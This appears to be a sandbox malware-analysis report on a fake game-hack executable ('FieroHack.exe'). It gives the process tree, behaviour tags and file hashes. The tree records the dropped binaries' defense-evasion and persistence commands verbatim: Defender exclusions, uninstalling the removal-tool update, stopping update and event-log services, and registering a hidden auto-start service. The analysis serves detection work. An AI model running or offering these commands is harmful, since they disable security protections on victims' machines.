C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1532
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1608
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1616
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2664
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1676
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1696
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1800
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1856
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1880
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1896
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1944
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1952
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2044
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2060
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2160
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2372
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2380
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2412
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2528
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2604
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2620
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2648
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2656
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2776
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3036
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2072
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3344
-
C:\Users\Admin\AppData\Local\Temp\Midnight\FieroHack.exe"C:\Users\Admin\AppData\Local\Temp\Midnight\FieroHack.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1172 -
C:\Users\Admin\AppData\Roaming\WeMod.exeC:\Users\Admin\AppData\Roaming\WeMod.exe3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1568 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:516
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵
- Suspicious use of WriteProcessMemory
PID:1100 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:4292
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:4816
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:1920
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:2172
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:3000
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:3056
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3564
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2296
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4636
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4760
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe4⤵PID:4628
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "BRSLGMVC"4⤵
- Launches sc.exe
PID:1004
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "BRSLGMVC" binpath= "C:\ProgramData\ccghytpllojw\ritphyfejjmj.exe" start= "auto"4⤵
- Launches sc.exe
PID:2252
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:4532
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "BRSLGMVC"4⤵
- Launches sc.exe
PID:3100 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:3612
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\WeMod.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:372 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:1032
-
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵PID:3652
-
-
-
-
C:\Users\Admin\AppData\Roaming\Sirus.exeC:\Users\Admin\AppData\Roaming\Sirus.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1792 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1792 -s 32884⤵
- Program crash
PID:556
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3352
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3500
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3748
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3912
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4112
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:5076
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:1276
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:2680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:4956
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:2308
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:3988
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:1468
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:2280
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:1088
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:1564
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2424
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3852
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks SCSI registry key(s)
PID:2572
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵PID:2120
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1792 -ip 17922⤵PID:3664
-
-
C:\ProgramData\ccghytpllojw\ritphyfejjmj.exeC:\ProgramData\ccghytpllojw\ritphyfejjmj.exe1⤵
- Executes dropped EXE
PID:3952
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82